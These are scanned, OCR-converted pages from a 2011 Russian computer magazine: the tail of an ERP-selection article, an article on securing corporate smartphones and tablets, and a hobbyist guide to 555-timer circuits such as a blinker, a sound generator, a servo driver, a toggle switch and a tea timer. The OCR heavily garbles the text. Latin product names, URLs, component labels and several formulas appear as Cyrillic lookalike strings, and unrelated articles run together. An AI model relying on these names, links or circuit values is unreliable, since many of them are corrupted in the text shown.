торгов. Важным условием проведения торгов на электронной 
площадке в данном случае является сопоставимость стоимостных 
предложений компаний кандидатов. Итог данного этапа - полу- 
чение уточненных предложений от кандидатов. Остается только 
технически выбрать наилучшее предложение (благо, критерии 
выбора уже определены, а стоимость предложений снижена) и 
вуаля - можно приступать к работе. 

Заключение 

Итак, мы поняли, что ключом куспеху автоматизации бизнеса 
является пошаговое последовательное движение от бизнес-задач 
к рассмотрению и выбору нужной нам ЕРР-системы. При этом не- 
обходимо выполнить следующие шаги: 

• подготовка бизнестребований кпроекту; 

• расчет экономического эффекта; 

• защита проекта перед руководством компании; 

•формирование функциональных требований к ЕРР, определение 
необходимых модулей системы; 

• анализ рынка доступных систем и подготовка Іопд бзЦ 

• проведение рабочих встреч, выбор кандидатов в збогі Іізі ; 

• уточнение функциональныхтребований и критериев выбора 
победителя; 

• проведение конкурентных переговоров для улучшения пред- 
ложений; 

• выбор победителя. 

Каждый из этих шагов важен, а их последовательное прохождение 
позволяет правильно выйти на реализацию проекта. А вот пра- 
вильно исполнить его, чтобы гарантировать получение нужного 
результата — это уже другая история, ц-ц 
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Мобильная 

безопасность 

Защита мобильных устройств 
в корпоративной среде 

В этом году рынок мобильных устройств впервые обогнал рынок ПК. Это знаковое событие, а так- 
же стремительный рост вычислительной мощности и возможностей мобильных устройств ставят 
перед нами новые вопросы и проблемы в области обеспечения информационной безопасности. 



Современные смартфоны и планшеты содержатв себе вполне взрос- 
лый функционал, аналогичныйтаковомуусвоих«старших братьев». 
Удаленное администрирование, поддержка ѴРІ\І, браузеры с бІазЬ и 
Іаѵа-зсгірі:, синхронизация почты, заметок, обмен файлами. Все это 
оченьудобно, однако рынок средств защиты для подобныхустройств 
развитеще слабо. Удачным примером корпоративного стандарта 
является ВІаскВеггу, смартфон с поддержкой централизованного 
управления через сервер, шифрованием, возможностями удаленного 
уничтожения данных на устройстве. Однако его доля на рынке нетак 
велика, а на российском и вовсе практически отсутствует. Но суще- 
ствует масса устройств на базе ѴѴіпсІоѵѵз МоЬіІе, АпбгоісІ, Ю5, ЗутЬіап, 
которыезащищены значительно слабее. Основные проблемы безопас- 
ности связаны стем, что многообразие ОС для мобильныхустройств 
весьма велико, также каки количество их версий в одном семействе. 
Тестирование и поискуязвимостей в них происходитнетакинтенсивно 
какдля ОС на ПК, тоже самое касается и мобильных приложений. Со- 
временные мобильные браузерыуже практически догнали настольные 
аналоги, однако расширение функционала влечетза собой большую 
сложность и меньшую защищенность. Далеко не все производители 
выпуска ютобновления, закрывающие критическиеуязвимости для 
своихустройств — дело в маркетинге и в срокахжизни конкретного 
аппарата. Предлагаю рассмотреть типичные данные, хранящиеся на 
смартфоне, которые могут быть полезны для злоумышленника. 

1. Доступ к почте и почтовому ящику. 

Как правило, доступ к почтовым сервисам и синхронизация почты 
настраиваются на мобильном устройстве один раз, и в случае потери 
или хищения аппарата злоумышленники получают доступ ко всей 
переписке, а также ко всем сервисам, привязанным к да иному по- 
чтовому ящику. 

2. Интернет-пейджеры. 

Зкуре, Ісц, ЗаЬЬег — все это не чуждо современным мобильным 
устройствам, в результате чего и вся переписка данного конкретного 
человека, и его контакт-листы могут быть под угрозой. 

3. Документы, заметки. 

ОгорВох для мобильныхустройств вполне может стать источником 
компрометации каких-либо документов, равно каки различные 
заметки и события в календаре. Емкость современныхустройств 
достаточно велика, чтобы они могли заменить изЬ-накопители, а 
документы и файлы с них вполне способны порадовать злоумышлен- 
ников. Нередко в смартфонах встречается использование заметок 
как универсально го справочника паролей, также распространены 
хранящие пароли приложения, защищенные мастер-ключом. Необ- 
ходимо учитывать, что в таком случае стойкость всех паролей равна 
стойкости этого ключа и грамотности реализации приложения. 

4. Адресная книга. 

Иногда сведения об определенных людях стоят очень дорого. 



5. Сетевые средства. 

Использование смартфона или планшета для удаленного доступа 
к рабочему месту посредством ѴІЧС, ТеаппѴіеѵѵег и прочих средств 
удаленного администрирования уже не редкость. Также как и 
доступ к корпоративной сети через ѴРІ\І. Скомпрометировав свое 
устройство, сотрудник можетскомпрометировать всю «защищен- 
ную» сеть предприятия. 

6. Мобильный банкинг. 

Представь, что твой сотрудник использует на своем мобильном 
устройстве систему ДБО — современные браузеры вполне позво- 
ляют осуществлять подобный вид деятельности, и это же мобиль- 
ное устройство привязано к банку для получения зтз-паролей и 
оповещений. Несложно догадаться, что вся система ДБО может 
быть скомпрометирована потерей одного устройства. 

Основными путями компрометации информации с мобильных 
устройств является их пропажа или хищение. Сообщения о 
громадных финансовых потерях организаций из-за пропажи 
ноутбуков мы получаем регулярно, однако потеря бухгалтерского 
планшета с актуальной финансовой информацией тоже может 
доставить множество хлопот. Вредоносное ПО для смартфонов 
и планшетов в настоящее время скорее страшный миф и сред- 
ство маркетинга, однако не следуеттерять бдительность, ибо 
этот рынок развивается бешеными темпами. Рассмотрим, какие 
существуют и как реализованы средства защиты в современных 
мобильных ОС. 

Средства защиты мобильных ОС 

Современные ОС для мобильных устройств имеют неплохой набор 
встроенных средств защиты, однако зачастую те или иные функ- 
ции не используются или отключаются. 

ѴѴіпсІоѵѵзМоЬіІе 

Одна из старейших ОС на рынке. ПО для версий 5.0 и 6.x совме- 
стимо, из-за чего для них существует большое количество средств 
защиты. Начиная с версии 6.0 поддерживается шифрование карт 
памяти. ОС не имеет средств предотвращения установки приложе- 
ний из сторонних непроверенных источников, поэтому подвержена 
заражению вредоносным ПО. Кроме концептов существует ряд 
реальных вредоносных программ под эту платформу. Корпора- 
тивные решения представлены множеством компаний (Казрегзку 
Епброіпі Зесигііу іюг ЗтагІрЬопе, Ог.ѴѴеЬ Епіегргізе Зесигііу Биііе, 
МсАІюе МоЬіІе Зесигііу бог Епбегргізе, Зутапіес МоЬіІе Зесигііу 
ЗиЛе Ь г ѴѴіпсІоѵѵз МоЬіІе, Е5ЕТ N0032 МоЬіІе Зесигііу, ОиагсІіапЕсІде 
ЗтагІрЬопе Ргоіесііоп). Данные решения предлагают не только 
антивирусную защиту, но и средства фильтрации трафика через 
все каналы связи мобильного устройства, средства шифрования, 
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По данным Лаборатории Касперского на февраль 2010 года. 



централизованного развертывания и управления. Решение от 
ОиагсІіапЕсІде включает в себя элементы 01_Р-системы. Средства 
ОС с помощью АсІіѵеБупс и ЕхсЬапде Бегѵег разрешают удаленное 
уничтожение данных на устройстве. С помощью ЕхсЬапде Бегѵег 
можно настраивать политики безопасности на устройствах, такие 
как использование экрана блокировки, длина пин- кода и прочее. 
Выход новых прошивок, содержащих исправления уязвимостей, 
зависит от производителя устройств, но в целом это происходит 
крайне редко. Случаи повышения версии ОСтакже крайне редки. 
ѴѴіпсІоѵѵз РЬопе 7 (ѴѴР7) вышла в свет совсем недавно, о корпора- 
тивных решениях для защиты этой ОСпока ничего не известно. 

БутЫапОБ 

Несмотря на недавний переход ІЧокіа в объятия ѴѴР7, БуппЬіап все 
еще превалирует на рынке мобильных ОС. Приложения для Ыокіа 
распространяются в виде зіз-пакетов с цифровой подписью разра- 
ботчика. Подпись самодельным сертификатом возможна, однако это 
накладываетограничения на возможности ПО. Таким образом, сама 
система хорошо защищена от возможной малвари. 5аѵа-апплеты и 
5І5-приложения спрашиваюту пользователя подтверждение на вы- 
полнение тех или иных действий (выход в сеть, отправка смс), однако, 
какты понимаешь, злоумышленника это останавливает не всегда 
- многие пользователи склонны соглашаться со всеми выдвинуты- 
ми ОС предложениями, не особенно вчитываясь в их суть. Симбиан 
также содержит средства для шифрования карт памяти, возможно 
использование блокировки со стойкими паролями, поддержива- 
ются ЕхсЬапде АсІіѵеБупс (ЕА5) роіісіез, позволяющие удаленное 
уничтожение данных на устройстве. Существует множество решений 
защиты информации, представленных ведущими производителями 
(Бутапіес МоЬіІе Бесигііу к> г БуппЬіап, Казрегзку Епсіроіпі Бесигііу іюг 
БтагІрЬопе, Е5ЕТ N0032 МоЬіІе Бесигііу), которые по функционалу 
близки кѴѴіпсіоѵѵз МоЬіІе версиям. 

Несмотря на все перечисленное, существует ряд способов получения 
полного доступа с подменой файла «іпзіаіізегѵег», осуществляю- 
щего проверку подписей и разрешений устанавливаемого ПО. Как 
правило, пользователи применяют это для установки взломанного 
ПО, которое, естественно, теряет подпись после взлома. Втаком 
случае неплохая в целом система защиты ОС может быть скомпроме- 
тирована. Прошивки для своихустройств N окіа выпускает регулярно, 



особенно для новинок. Средний срокжизни аппарата 2-2,5 года, в 
этот период можно ожидать исцеления детских болезней аппаратов и 
исправления критических уязвимостей. 

ЮБ 

Операционная система отАррІе. Для устройств третьего поколения (Здз 
и старше) поддерживается аппаратное шифрование да иных средства- 
ми системы. ОС поддерживает политики ЕАБ, позволяет осуществлять 
удаленноеуправление и конфигурацию через Арріе РизЬ ІМоІіІісаІіоп 
Бегѵісе, втом числе поддерживается и удаленное стирание данных. 
Закрытость платформы и ориентированность на использование Арріе 
Біоге обеспечивает высокую защиту от вредоносного ПО. Корпоратив- 
ные средства защиты представлены меньшим количеством компаний 
(ОиагсІіапЕсІде БтагІрЬопе Ргоіесііоп, Рапсіа АпІіѵігизІогМас, БорЬоз 
МоЬіІе Сопігоі). Причем решение от РапЬа — это антивирус для дескто- 
па, который можетсканироватьи іОБ-устройства, подключенные к Мае. 
Решениеот БорЬоз заявлено, но находится в разработке (на моментна- 
писания статьи, март201 1 - прим. ред.). Однако, каки в случае БуппЬіап, 
система может быть скомпрометирована из-за сделанного ЗаіІЬгеак’а. 
Недавняя новость о взломе іОБФраунгоферовским институтом 
технологий защиты информации —тому подтверждение. Обновление 
прошивок и закрытие уязвимостей происходит для устройств отАррІе 
регулярно. 

АпсІгоісІОБ 

Молодая на рынке мобильных устройств система, детище Ооодіе, 
стремительно завоевала рынок. Начинаясверсии 1 .6 в ней под- 
держивается протокол ЕхсЬапде Асііѵезупс, что делаетустройства 
сданнойОС интересными для корпоративного сегмента. Полити- 
ки ЕАБ (впрочем, далеко не все) также поддерживаются. Шифро- 
вание карт памяти средствами ОС не предусмотрено. Существует 
ряд корпоративных решений для защиты (МсАІее ѴѴаѵеБесиге, 
ТгепЬ Місго МоЬіІе Бесигііу !ог АпЬгоісІ, Ог.ѴѴеЬ для Ап сі го ісі, за- 
явлены решения от Казрегзку). Приложения распространяются 
через АпсІгоісІ Магкеі, однако ничто не мешает устанавливать их 
и из других источников. Вредоносное ПО для АпсІгоісІ существу- 
ет, однако при установке ОС показывает все действия, которые 
требуются для устанавливаемой программы, поэтому в данном 
случае все зависит напрямую от пользователя (впрочем, указан- 
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ные при установке предупреждения все равно никто не читает, 
большинство вполне легальных программ из Маркета выдают 
кучу ворнингов на доступ ко всем мыслимым местам системы - 
прим. ред.). 

ОС имеетзащиту от модификации, но, каки для ЗутЬіап и Ю5, воз- 
можно получение полного доступа ксистеме, здесь это называется 
гооі. После получения гооі возможна запись в системные области и 
даже подмена системных приложений. Обновление проши вок и по- 
вышение версий ОС, исправление ошибок и уязвимостей происходит 
регулярно на большинстве устройств. 

Подводя промежуточный итог, можно сказать, что современные 
мобильные ОС обладаютнеплохими средствами защиты — как 
встроенными, так и представленными на рынке. Основными пробле- 
мами являются несвоевременность или невозможность получения 
обновлений, обходзащиты самим пользователем, отсутствие корпо- 
ративной политики безопасности для мобильныхустройств. Из-за 
различия ОС и их версий не существует единого корпоративного 
решения, которое можно было бы посоветовать. Но рассмотрим, какие 
шаги необходимо предпринять для защиты устройств и что учесть при 
создании политикИБ. 

1 . Блокировка устройства. 

Представь, что твой смартфон попал в руки к постороннему челове- 
ку. Для большинства пользователей это означает, что некто получит 
доступ сразу ко всему. Необходимо блокировать устройство паролем 
(стойким или с ограниченным количеством попыток ввода), после 
которых данные на устройстве затираются или устройство блокиру- 
ется. 

2. Использование криптографических средств. 

Необходимо использовать шифрование съемных носителей, карт 
памяти - всего, к чему может получить доступ злоумышленник. 

3. Запрет на сохранение паролей в браузере мобильного устройства. 

Нельзя сохранять пароли в менеджерах паролей браузеров, даже мо- 
бильных. Желательно установить ограничение на доступ к переписке 
почтовой и смс, использовать шифрование. 

4. Запрет использования менеджеров паролей для корпоративных 
учетныхзаписей. 

Существует множество приложений, созданных для хранения всех 
паролей на мобильном устройстве. Доступ к приложению осуществля- 
ется вводом мастер-ключа. Если он недостаточно стоек, вся парольная 
политика организации компрометируется. 



5. Запрет на установку ПО из непроверенных источников, осущест- 
вление «взломов» ОС. 

К несчастью, средства для принудительного запрета есть только для 
ѴѴіпсІоѵѵз МоЬіІе устройств, в остальных случаях придется доверять 
пользователю на слово. Желательно использовать ПО от крупных, из- 
вестных разработчиков. 

6. Использование политик ЕхсЬапде АсІіѵеЗупс и средств 
антивирусной и прочей защиты, если это возможно, позволит 
избежать множества угроз (в том числе новых), а в случае потери 
или кражи устройства осуществить его блокировку и уничтожение 
данных на нем. 

7. В случае предоставления доступа в доверенную зону осущест- 
влять тщательный контроль. 

Для пользователей, обладающих доступом кдоверенной зоне 
(внутренней сети по ѴРЫ, средствами удаленного администриро- 
вания), необходимо еще более тщательно следитьза выполнением 
вышеизложенных правил (рекомендовать им использовать ІР5ЕС, 
не хранить аутентификационные данные в приложениях). В случае 
компрометации устройства возможна угроза для всей внутренней/ 
доверенной зоны, что недопустимо. 

8. Ограничить список данных, которые можно передавать облач- 
ным сервисам. 

Современные мобильныеустройства и приложения ориентирова- 
ны на использование множества облачных сервисов. Необходимо 
следить, чтобы конфиденциальные данные и данные, относящиеся 
к коммерческой тайне, не были случайно синхронизированы или от- 
правлены в один из таких сервисов. 

Заключение 

В завершение можно сказать, что для корпоративного применения 
желательно использовать одну и туже платформу (а лучше — оди- 
наковыеустройства) сустановленным ПО корпоративного класса, 
которое можно конфигурировать и обновлять централизованно. Из 
текста статьи очевидно, что необходимо разработать и внедрить 
политику И Б в отношении мобильныхустройств, осуществлять про- 
верки ее исполнения и обязательно использовать Ехсбапде-сервер 
для задания политик ЕА8. В данной статье не была рассмотрена 
ВІаскВеггу 05 (ввиду практически полного отсутствия на россий- 
ском рынке), однако стоит отметить, что данная платформа является 
корпоративным стандартом во многих странах мира. □□ 
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Микросхема 555 

Собираем 5 гаджетов на базе микросхемы 555 



© Микросхема 555 появилась сорок лет назад и стала фактически 
первым таймером на широком рынке. С тех пор из-за бешеной попу- 
лярности микросхемы ее начали выпускать почти все производители 
электронных компонентов, и несмотря на почтенный возраст, 555 до 
сих пор выходит многомиллионными тиражами. 



В этом году прошел конкурс проектов ( бббсопіезі.сот ). использую- 
щих ее для решения самых разных задач. Заявки принимались 
в нескольких категориях: искусство, сложные проекты, минима- 
листичные и полезные гаджеты. Призовой фонд составлял около 
$1500. 

Среди нескольких сотен проектов была видеоигра, собранная на 
целой горсти 555; контроллер для пинбола; электрогитара; устрой- 
ство, не дающее спать соседям; замок, отпирающий дверь по 
секретному стуку и еще куча интересного. 

Если ты хоть раз в жизни держал паяльник и даже отличишь рези- 
стор от транзистора, а со старушкой 555 еще не знаком, то нужно 
срочно исправить ситуацию. Что это за зверь? Внутри пластикового 
корпуса с восемью выводами скрывается пара десятков транзи- 
сторов, диодов и резисторов, но в доскональное изучение работы 
таймера вдаваться не будем, пусть он останется для нас черным 
ящиком, из которого торчат ножки. А вот ножки обсудим. 

Земля. Здесь все просто, во всех схемах ее нужно подключать к 
минусу питания. 

2. Триггер, он же пуск. Если напряжение на пуске падает ниже одной 
трети напряжения питания (Ѵсс) — например, нажимается кнопка, 
притянутая к земле, — то схема стартует. 

3. Выход. Задача таймера простая — генерировать прямоугольные 
импульсы заданной длины (длительность задается парой сопро- 
тивлений и конденсатором). Напряжение выхода примерно на 2 В 



ниже напряжения питания, когда он включен, и почти ноль (меньше 
0,5 В), когда выключен. Максимальная нагрузка, которую способен 
выдержать выход — около 200 мА. Этого достаточно для небольшого 
динамика, парочки светодиодов или маленького реле. 

4. Сброс. Если подать на него низкий уровень (меньше 0,7 В), то 
схема переходит в исходное состояние, и выход становится низким. 
Если в схеме сброс не нужен, то лучше притянуть его к плюсу, чтобы 
он не скидывал случайно (например, от прикосновения пальцем). 

5. Контроль. Напряжение, приложенное к этой ноге, может изменять 
длительность выходов таймера. Но используется он редко, а вися- 
щий в воздухе — может сбивать работу, поэтому в схемах лучше 
присоединить к земле через небольшой керамический конденсатор 
на 1 0 нФ. 

6 . Порог, он же стоп. Если напряжение на нем выше 2/3 Ѵсс, то таймер 
останавливается и выход переводится в выключенное состояние. 
Работает, только если вход при этом выключен. 

7. Разряд. Этот выход соединяется с землей внутри микросхемы, 
когда на выходе низкий уровень, и используется, чтобы разрядить 
конденсатор временной цепочки. Может пропускать до 200 мА и 
иногда используется как дополнительный выход. 

8 . Питание. Нужно подключить к плюсу питания. Микросхема поддер- 
живает напряжения от 4,5 В до 1 6 В. Можно запитать от обычной 
9В-батарейки, можно от блока питания детских игрушек или от про- 
водка 118В 
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Заводим лошадку. Режимы 
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Моностабильный. При подаче сигнала на 
вход микросхема включается, генериру- 
ет выходной импульс заданной длины и 
выключается, ожидая нового входного 
импульса. Важно, что после включения 
микросхема не будет реагировать на новые 
сигналы, сколько бы их не посылали. 

Длину импульса можно посчитать по простой 
формуле 1=1 ,1 *Р1 *С4. Чтобы получить время в 
секундах, сопротивление нужно подставлять 
в мегаомах, а емкость — в микрофарадах. 
Например, при 04=1 00 мкФ и Р1 =2,2 МОм 
период будет примерно 4 минуты. Эту цифру 
можно менять в очень широких пределах: от 
0,000001 секунды до 15 минут. Втеории можно 
и еще больше, но на практике возникнут про- 
блемы. 




2. Нестабильный мультивибратор. В этом режиме 
таймером и управлять-то не надо, он сам 
себе хозяин — сперва включится, подо- 
ждет время 11, потом выключится, подождет 
время 12, и все заново. На выходе получа- 
ется забор из высоких и низких состояний, 
что в лучших традиция А5С 1 1 -а рта можно 
представить так: П_П_П_П_П. Частота, с 
которой будет колебаться вся система, зави- 
сит от параметров РС-цепочки (точнее — от 
величин Р2, РЗ и С 1 ) и ее можно посчи- 
тать по формуле ! = 1,44/((РЗ + 2Р2 )С1). В 
течение времени 11 = 0,693 (РЗ + Р2)С1 на 
выходе будет высокий уровень, а в течение 
12=0,693(Р2)С1 — низкий. 




3. Бистабильный. В этом режиме микросхема 
используется как выключатель. Нажал одну 
кнопку — выход включился, нажал другую — 
выключился. 

Довольно теоретического экскурса, навер- 
няка ты уже захотел приступить к практике. 
Собирать простые железки удобно на макет- 
ной плате без пайки — ее, как и все детали, 
можно прикупить в любой радиолавке, за 
пару сотен рублей. Но у меня почта ближе, 
чем магазин, и я заказывал все детали из 
Гонконга на зигееіесігопісз.пеі: . хотя этот 
вариант на любителя — нужно много терпе- 
ния: посылка будет идти почти месяц. 
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Задача №1 : собрать «хэллоу ворлд» — мор- 
галку светодиодиком. Все просто, как и в 
мире софта, но в железе даже для такой 
безделушки можно придумать полезное при- 
менение. 

От каких деталей уж совсем никак не отвер- 
теться? Во-первых, сам таймер 555 (на 
схеме I С 1 ) . Подойдет таймер любого произ- 
водителя, но чтобы экспериментировать на 
макетке — бери в корпусе йІР с длинными 
ножками. Его названия у разных произво- 
дителей незначительно отличаются, но три 
пятерочки в них есть всегда. Например, та, 



что я использую в примерах этой статьи, 
называется ЫЕбббІЧ. Существуют и другие 
версии схемы, 556 и 558, у которых в одном 
корпусе стоит 2 и 4 таймера соответственно. 
Они тоже подойдут для всех примеров, про- 
сто у них больше ног и расположены они 
иначе. Во-вторых, потребуются конденсато- 
ры: электролитический С1 емкостью от 5 до 
10 мкФ и керамический СЗ на 10 нФ. Еще 
будут нужны: светодиод ЦЕОЦ любого цвета 
и к нему токоограничительный резистор 
(Р5) на 300-600 Ом (у меня 470 Ом), а также 
резисторы, задающие частоту Р1 на 1 кОм и 
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Н2 на 10 кОм. Последнее из обязательной 
программы — маленькая кнопка (типа той, 
что ставят в мыши и на всяческие прибор- 
ные панели). Еще на схеме есть конден- 
сатор С2 на 100 мкФ, который перекинут 
от плюса к минусу. Если у тебя с питанием 
все хорошо (например, ты используешь 
батарейку), то необходимости в нем нет, а 
с дешевым сетевым адаптером без тако- 
го конденсатора никуда. В примерах я 
использовал пятивольтовый блок питания 
от детской китайской игрушки, на выпря- 
мителе которого производитель сэкономил 
— в результате без этой сглаживающей 
емкости схема не работала вовсе. Поэтому 
на всех схемах в статье этот конденсатор 
есть, а ставить его или нет — решать тебе. 
Также при желании можно опустить и кон- 
денсатор СЗ, который притягивает пятую 
ногу к земле, но в этом случае стабиль- 
ность гарантировать не стану. 

Схема работает в нестабильном режиме и 
собрана таким образом, что пока подклю- 
чена к питанию, то постоянно генерирует 
выходные импульсы, а как только мы нажи- 
маем кнопку, то замыкаем ее выход на све- 
тодиод и ее работа становится видна. 
Теперь можешь собрать все по схеме. 

При нажатии кнопки светодиод должен 



бодро начать моргать. Если не заработало, 
то проверяй контакты и полярности. На 
микросхеме 555 у одного из краев есть 
выемка: поставь схему так, чтобы выемка 
была слева, тогда ножки в нижнем ряду 
будут нумероваться слева направо от 1 до 
4, а в верхнем — справа налево от 5 до 8. У 
светодиода более длинный выход должен 
подключаться к плюсу, а более короткий — 
к минусу. Если у диода ножки одной длины, 
то на помощь придет плоская литиевая 
батарейка, вроде той, что стоят на материн- 
ских платах. Подключи светодиод и так и 
эдак, когда он засветится — плюс и минус у 
него будут расположены, как на батарейке. 
Если не заработал в обоих положениях, 
то либо диод горелый, либо это не диод — 
фототранзисторы могут выглядеть точно 
так же, как светодиоды. У электролитиче- 
ских конденсаторов минус, как правило, 
помечен светлой полосой на корпусе. Для 
остальных деталей полярность не важна. 
Теперь о практической пользе. В некоторых 
играх бывает необходимо щелкать по 
левой кнопке беспрестанно, натирая мозо- 
ли на пальце, но это не наш метод. Можно 
собрать эту схему покомпактнее, припаяв 
детали напрямую к выходам микросхемы, и 
запихнуть в корпус любой УЗВ-мыши — 



места там, как правило, хватает. Из схемы 
нужно только выкинуть светодиод с его 
резистором, а третью ножку микросхемы 
подпаять напрямую к плюсу левой кнопки 
мыши. 




Определить, где в мышиной кнопке плюс 
(зеленая точка на фото), а где — минус, 
обычно несложно: контакт с нулем более 
толстый и идет к черному проводу от 115В, 
а другой — это плюс, к нему и подпаивай- 
ся. Для питания подключайся к красному и 
черному проводам, уходящим в сторону 
компьютера, их контакты также помечены 
на фото. Просверли слева в корпусе мышки 
отверстие (так, чтобы было удобно дотяги- 
ваться до него большим пальцем) и устано- 
ви туда кнопку при помощи термоклеевого 
пистолета. Все, теперь можешь нещадно 
валить врагов. 



СОЗДАЕМ ЭЛЕКТРОННУЮ МУЗЫКУ 






Еще одна схемка, в которой таймер также 
работает в режиме мультивибратора, но 
задача у нее другая. Она перенесет тебя в 
прошлое, в прокуренные студии отцов анде- 
граундной электронной музыки, которым 
приходилось самим ваять устройства, при 
помощи которых они создавали бессмерт- 
ные хиты. 

Изменения в предыдущей схеме придется 
сделать совсем небольшие. Вместо свето- 
диода с его резистором здесь установлен 
динамик, подключенный к земле через 
конденсатор 04 — он нужен, чтобы отфиль- 
тровать постоянную составляющую выхода 



и прогонять через динамик только перемен- 
ный ток. Для максимальной громкости этот 
конденсатор должен быть электролитиче- 
ским, емкостью порядка 10 мкФ, но подоб- 
ный звук будет резать ухо, и если такой 
задачи не стоит, поставь керамический 
на 100 нФ, будет потише. Можешь взять 
динамик из сломанных больших наушников 
или бипер из старого системного блока. 
Пьезодинамик (в виде круглой металличе- 
ской пластинки) также подойдет, плюс ему 
не нужен конденсатор 04. 

Поскольку звуковые частоты несколько 
выше, чем частота моргания диода, то 



НС-цепочку тоже придется чутка переде- 
лать. Конденсатор С1 заменить на керами- 
ческий 100 нФ, резистор Р2 заменить на 
1 кОм и последовательно с ним поставить 
переменный резистор РЗ на 10 кОм. У 
переменных резисторов обычно 3 ножки, 
расположенные в ряд, но тебе нужно под- 
ключить только две — любую из крайних и 
центральную. Такие параметры не позволят 
частоте убежать за слышимый диапазон на 
всем диапазоне РЗ. Резистором выставляй 
частоту, нажимай кнопку и слушай, что 
звучит. При некоторой сноровке получится 
музыка. 
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Еще одна схема в режиме мультивибратора. 
Здесь при помощи таймера 555 ты будешь 
управлять сервомашинкой. Крути перемен- 
ный резистор, а машинка будет крутить все, 
что угодно. Сервоприводы (или просто сервы) 
используются обычно в радиоуправляемых 
модельках машин/вертолетов/самолетов, но 
это не значит, что ты не найдешь им другого 
применения. 

Для начала тебе нужно эту машинку где- 
нибудь достать. Неплохой выбор недорогих 
серв есть в популярном китайском онлайн- 
магазинчике ОеаІЕхІгете (с 
зеагсб/зегѵо ]. все свои я заказывал именно 
там. В наших магазинах они тоже есть, но 
заметно дороже. 

Типичная хобби-серво имеет три провода: 
черный или коричневый минус питания, кото- 
рый нужно подключить к контакту 5ЕРѴ0-3 на 
схеме, красный плюс — к 5ЕРѴ0-1 , желтый 
или белый для управляющих команд — к 
5ЕРѴ0-2. 

Серво ждет, что по сигнальному проводу 
50 раз в секунду будут приходить короткие 
импульсы длиной от 0,9 до 2,1 мс, и длитель- 
ность сигнала подскажет, на какой угол нужно 




отклониться. Параметры РС-цепочки в схеме 
подобраны таким образом, чтобы обеспечить 
именно такие сигналы. Поскольку время 
импульса должно быть меньше, чем время 
между ними, то в схему нужно добавить диод 
йі . В схеме указан 1 п41 48, так как он один из 
самых распространенных, но можно заменить 
его на другой. Определить полярность диода 
просто — перпендикулярная полоска на кор- 
пусе соответствует черте на схеме. 

Таймер 555 — штука простая, хоть 15 вольт 
на вход подавай, ей все нипочем. А сервома- 
шинка требует более бережного отношения 
и работает только в диапазоне напряжений 
от 4,8 В до 6 В. Так что если для питания ты 
использовал батарейку на 9 В, то придется 
напряжение понижать. С этой задачей отлич- 
но справляется стабилизатор 7805, который 
срезает все лишнее и оставляет на выходе 
чистые 5 В. Правда, все лишние вольты он 
попросту преобразует в тепло и может сильно 
нагреваться. Хотя, нагреваясь, стабилизатор 
поддерживает приятный теплый микро- 
климат в комнате, его не стоит применять в 
проектах, питающихся от батареек — про- 
жорливый он. Включить его в схему просто: 
если ты возьмешь его за выходы и будешь 
читать надписи на корпусе, то первая нога 
окажется слева — ее нужно подсоединить к 
плюсу батареи, вторую — к общей земле, а 



третья — выход +5 В. 

Собрав эту штуку, ты сможешь не просто 
тестировать сервы на работоспособность, а 
еще удаленно управлять выключателями и 
открывать замки. 
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Порой необходимо, чтобы твоя схемка 
работала, как телевизор: нажал кнопочку, 
она включилась, нажал еще раз — выклю- 
чилась. И эту задачу тоже можно решить 
на 555. Внутри микросхемы запрятан 



триггер, который для этой цели можно 
использовать. 

Основная часть схемы уже не долж- 
на вызывать у тебя особых вопросов, 
остановлюсь лишь на выходе третьей 



ЭЛЕМЕНТ 


ПАРАМЕТРЫ 


Конденсатор С1 


1 0 мкФ 


Конденсатор С2 


100 мкФ 


Конденсатор СЗ 


10 нФ 


Микросхема ІС1 


ЫЕ555 


Светодиод ЕЕРІ 




Резистор Р1 


10 кОм 


Резистор Р2 


10 кОм 


Резистор РЗ 


100 кОм 


Резистор Р4 


1 кОм 


Резистор Р5 


470 Ом 


Кнопка 51 




Транзистор Т1 


2Ы3904 



ХАКЕР 05 /148/ 201 1 



► 133 







РНРЕАКІЫ6 



ножки, а именно — резисторе Р4 и тран- 
зисторе Т1. Ведь мы делаем кнопку, а 
значит — она должна уметь пропускать 
ток, и не факт, что 200 мА, на которые 
способен 555, будет достаточно. Здесь в 
качестве ключа используется небольшой 
ЫРЫ-транзистор 2 N 39 04, который спосо- 



бен пропускать те же 200 мА, что и сам 
таймер, и смысла в нем немного, но его 
всегда можно заменить на более мощный 
МОП-транзистор — например, ІРЕ630, 
который позволит подключить нагрузку 
до 9А. Правда, для такого транса напря- 
жение придется увеличить на схеме до 



12 вольт, иначе затвор не откроется. 
Еще не очень круто применять такой 
выключатель в мобильных устройствах, 
так как даже в выключенном состоянии 
он потребляет ток в 3-6 мА, что заметно 
подсаживает батарею. 
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Когда я только начал знакомиться с 
Ііпих’ом, мне попалась небольшая, но 
очень важная программа для приготовле- 
ния чая. В ней можно выбрать сорт чая, и 
по прошествии времени, необходимого для 
заварки, она начинала помаргивать икон- 
кой в трее и пищать. Из какого дистри- 
бутива была программа, я уже не помню, 
но она пару раз помогла мне выпить не 
остывший чай. С программами всегда так: 
снес операционку — и нет ее, а железка на 
столе куда надежнее! 

Для реализации этой штуковины понадо- 
бится целых два таймера 555. Один (тот, 
что на схеме слева) будет отсчитывать 4 
минуты, за которые заварка превращается 
в благоуханный напиток, а другой — гене- 
рировать импульсы для пищалки. 

Генератор на ІС2 трудолюбиво и непрерыв- 
но генерирует импульсы. Рассмотрим под- 
робнее первый таймер. Он подсоединен в 
моностабильном режиме. В нормальном 
состоянии сразу после включения питания 
на выходе 3 низкий уровень — он при- 
тянут к земле, а значит — пищит динамик 
и горит светодиод І_Е02 (на самом деле 
светодиод моргает, но очень быстро, и это 



незаметно). Как только нажимается кнопка 
51, таймер включается, на выходе 3 стано- 
вится высокий уровень, зажигается свето- 
диод 1ДЕ01, а динамик выключается, ведь 
ЕЕй2 хоть и «свето-», но все-таки диод, 
и в обратную сторону ток пропускать не 
будет. Так продолжается, пока конденсатор 
04 заряжается через резистор Р1. Когда 
напряжение на ножке 6 станет больше 2/3 
Ѵсс, то таймер выключится и вновь запи- 
щит бипер. 

Схему можно чутка модифицировать, доба- 
вив последовательно Р1 — переменный 
резистор на 500 кОм, тогда можно будет 
регулировать время заварки для разных 
сортов чая. 

Уверен, этих схем тебе хватит для вдохно- 
вения. Если нет — попробуй поискать что- 
нибудь на сайте іпзІгисІаЫез.сот . Также 
со схемами может помочь программа 555 
Тіппег Рго зсЬеппаі:іса.сопп/555 Тітег 
сіегід п/555 Тітег РРО ЕХ.Ыт . которая 
позволяет в пару кликов рассчитать 
детали для любого режима (правда, стоит 
она «всего» $29, но если постараться, то 
можно найти в сети более старую бесплат- 
ную версию). ИИ 
